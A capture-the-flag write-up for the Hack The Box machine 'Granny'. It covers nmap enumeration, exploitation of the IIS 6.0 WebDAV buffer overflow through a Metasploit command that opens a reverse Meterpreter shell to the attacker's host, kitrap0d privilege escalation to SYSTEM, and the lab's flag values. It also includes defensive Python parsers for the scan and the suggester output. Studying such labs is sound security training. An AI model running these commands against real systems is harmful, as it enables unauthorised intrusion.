About

Granny, while similar to Grandpa, can be exploited using several different methods. The intended method of solving this machine is the well-known WebDAV upload vulnerability.

Enumeration

Running the script portscan.sh reveals a single attack vector, HTTP.

┌──(m0nk3y@kali)-[~/HTB/Granny]
└─$ sudo portscan.sh 10.129.177.108

┌──(m0nk3y@kali)-[~/HTB/Granny]
└─$ cat PortScan\(10.129.177.108\)

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-ntlm-info:
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
| http-webdav-scan:
|   Server Date: Sat, 09 Sep 2023 05:14:48 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
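As an added defender-side check that is not part of the original writeup, the script below parses the nmap output above and flags what an auditor would care about: WebDAV methods that allow writing content to the server, TRACE being enabled, and an IIS version that no longer receives security updates. The sample input is a constructed copy of the relevant nmap lines.

```python
import re

# Constructed sample: the relevant lines of the nmap scan shown above.
NMAP_OUTPUT = """\
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
"""

# WebDAV methods that let a client create, modify, move or lock content on the server.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
# IIS releases whose host OS is out of support (IIS 6.0 ships with Server 2003, unsupported since July 2015).
EOL_IIS = {"4.0", "5.0", "5.1", "6.0"}

def parse_methods(nmap_text, key):
    """Return the set of HTTP methods listed after `key`, e.g. 'Allowed Methods:'."""
    m = re.search(re.escape(key) + r"\s*(.+)", nmap_text)
    if not m:
        return set()
    return {tok.strip(",") for tok in m.group(1).split()}

def iis_version(nmap_text):
    """Extract the IIS version from the Server header, or None if absent."""
    m = re.search(r"Microsoft-IIS/(\d+\.\d+)", nmap_text)
    return m.group(1) if m else None

def audit(nmap_text):
    """Return a list of findings a reviewer should raise for this scan."""
    findings = []
    allowed = parse_methods(nmap_text, "Allowed Methods:")
    public = parse_methods(nmap_text, "Public Options:")
    writable = sorted((allowed | public) & WRITE_METHODS)
    if writable:
        findings.append("WebDAV write methods exposed: " + " ".join(writable))
    if "TRACE" in allowed:
        findings.append("TRACE enabled (cross-site tracing risk)")
    ver = iis_version(nmap_text)
    if ver in EOL_IIS:
        findings.append(f"IIS {ver} is end-of-life and will not receive fixes for known WebDAV flaws")
    return findings

if __name__ == "__main__":
    for finding in audit(NMAP_OUTPUT):
        print("[!]", finding)
```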

Exploitation

HTTP

Since nmap identified the HTTP service as Microsoft IIS 6.0, I’ll check for known vulnerabilities using searchsploit-prettify.py. From the results, I’ll start by testing Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow, as it appears to give remote code execution directly.

┌──(m0nk3y@kali)-[~/HTB/Granny]
└─$ searchsploit-prettify.py 'Microsoft IIS 6.0'
 ---------------------------------------------------------------------------------------- ---------------------------------------------------------
| Exploit Title                                                                          | Path                                                    |
 ---------------------------------------------------------------------------------------- ---------------------------------------------------------
| Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure       | /usr/share/exploitdb/exploits/windows/remote/21057.txt  |
| Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                | /usr/share/exploitdb/exploits/windows/remote/9541.pl    |
| Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                  | /usr/share/exploitdb/exploits/windows/dos/9587.txt      |
| Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                           | /usr/share/exploitdb/exploits/windows/dos/3965.pl       |
| Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | /usr/share/exploitdb/exploits/windows/dos/15167.txt     |
| Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow               | /usr/share/exploitdb/exploits/windows/remote/41738.py   |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                            | /usr/share/exploitdb/exploits/windows/remote/8704.txt   |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                            | /usr/share/exploitdb/exploits/windows/remote/8806.pl    |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                        | /usr/share/exploitdb/exploits/windows/remote/8754.patch |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass                                | /usr/share/exploitdb/exploits/windows/remote/8765.php   |
| Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                               | /usr/share/exploitdb/exploits/windows/remote/19033.txt  |
 ---------------------------------------------------------------------------------------- ---------------------------------------------------------

Using a Metasploit module for the same vulnerability, I’m able to gain a shell on the target. However, running the command getuid fails with an error message indicating that access is denied. This usually happens when the session is running inside a process that lacks the privileges needed for the call.

┌──(m0nk3y@kali)-[~/HTB/Granny]
└─$ msfconsole -q -x 'use exploit/windows/iis/iis_webdav_scstoragepathfromurl; set RHOSTS 10.129.177.108; set RPORT 80; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOSTS => 10.129.177.108
RPORT => 80
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.129.177.108
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.177.108:1031) at 2023-09-09 01:16:13 -0400

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

By migrating to another process with higher privileges, I’m able to gain a shell as the user NT AUTHORITY\NETWORK SERVICE.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 584   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 772   392   svchost.exe
 796   392   svchost.exe
 988   392   spoolsv.exe
 1016  392   msdtc.exe
 1088  392   cisvc.exe
 1136  392   svchost.exe
 1192  392   inetinfo.exe
 1228  392   svchost.exe
 1332  392   VGAuthService.exe
 1404  392   vmtoolsd.exe
 1504  392   svchost.exe
 1612  392   svchost.exe
 1788  392   dllhost.exe
 1960  392   alg.exe
 1988  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2420  584   wmiprvse.exe
 3256  1504  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3328  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3696  3256  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe

meterpreter > migrate 1988
[*] Migrating from 3696 to 1988...
[*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

Privilege Escalation

In order to look for local vulnerabilities, I’ll use the module post/multi/recon/local_exploit_suggester. The result lists 7 potentially usable exploits.

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.129.177.108 - Collecting local exploits for x86/windows...
[*] 10.129.177.108 - 186 exploit checks are being tried...
[+] 10.129.177.108 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.177.108 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.177.108 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.177.108 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.177.108 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.177.108 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.177.108 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.177.108 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 9   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 10  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 11  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 12  exploit/windows/local/bits_ntlm_token_impersonation            No                       The check raised an exception.
 13  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 15  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 16  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 17  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 18  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
 19  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 20  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 21  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 22  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 23  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 24  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 25  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 26  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 27  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
 28  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 29  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 30  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 31  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The check raised an exception.
 32  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 33  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 34  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 35  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 36  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.
 37  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 38  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 39  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.
 40  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 41  exploit/windows/local/webexec                                  No                       The check raised an exception.
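From a remediation standpoint, the MS bulletin ids embedded in the suggester's module names point at the patches this host is apparently missing. The following script, added here and not part of the original writeup, parses a constructed excerpt of the "Valid modules" table above, extracts those bulletin ids from the "Yes" rows, optionally drops rows whose check "could not be validated", and lists modules (such as ppr_flatten_rec) that carry no bulletin id and need a manual lookup.

```python
import re

# Constructed sample: an excerpt of the local_exploit_suggester table shown above.
SUGGESTER_OUTPUT = """\
 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 27  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
"""

# One table row: index, module path, Yes/No flag, free-text check result.
ROW = re.compile(r"^\s*\d+\s+(exploit/\S+)\s+(Yes|No)\s+(.*)$")
# Bulletin id encoded in a module name, e.g. ms14_058 -> MS14-058.
BULLETIN = re.compile(r"ms(\d{2})_(\d{3})")

def parse_rows(text):
    """Yield (module, is_flagged_vulnerable, check_result) for each table row."""
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            yield m.group(1), m.group(2) == "Yes", m.group(3).strip()

def missing_bulletins(text, confirmed_only=False):
    """Sorted bulletin ids implied by the 'Yes' rows; with confirmed_only=True,
    rows whose check 'could not be validated' are ignored."""
    found = set()
    for module, flagged, result in parse_rows(text):
        if not flagged or (confirmed_only and "could not be validated" in result):
            continue
        b = BULLETIN.search(module)
        if b:
            found.add(f"MS{b.group(1)}-{b.group(2)}")
    return sorted(found)

def unmapped_candidates(text):
    """'Yes' modules without a bulletin id in their name; map these by hand."""
    return [m for m, flagged, _ in parse_rows(text) if flagged and not BULLETIN.search(m)]

if __name__ == "__main__":
    print("Missing patches (all flagged rows):", missing_bulletins(SUGGESTER_OUTPUT))
    print("Missing patches (confirmed only):  ", missing_bulletins(SUGGESTER_OUTPUT, confirmed_only=True))
    print("Needs manual mapping:              ", unmapped_candidates(SUGGESTER_OUTPUT))
```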

After some trial and error with the suggested modules, I’m able to use exploit/windows/local/ms10_015_kitrap0d to gain a shell as the user NT AUTHORITY\SYSTEM.

meterpreter > run exploit/windows/local/ms10_015_kitrap0d LHOST=10.10.16.9 LPORT=4444

[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 2792 launched.
[*] Reflectively injecting the DLL into 2792...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.177.108
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.177.108:1032) at 2023-09-09 01:19:13 -0400
[*] Session 2 created in the background.

meterpreter > sessions 2
[*] Backgrounding session 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Documents and Settings\Lakis\Desktop\user.txt'
700c5dc163014e22b3e408f8703f67d1

meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
aa4beed1c0584445ab463a6747bd06e9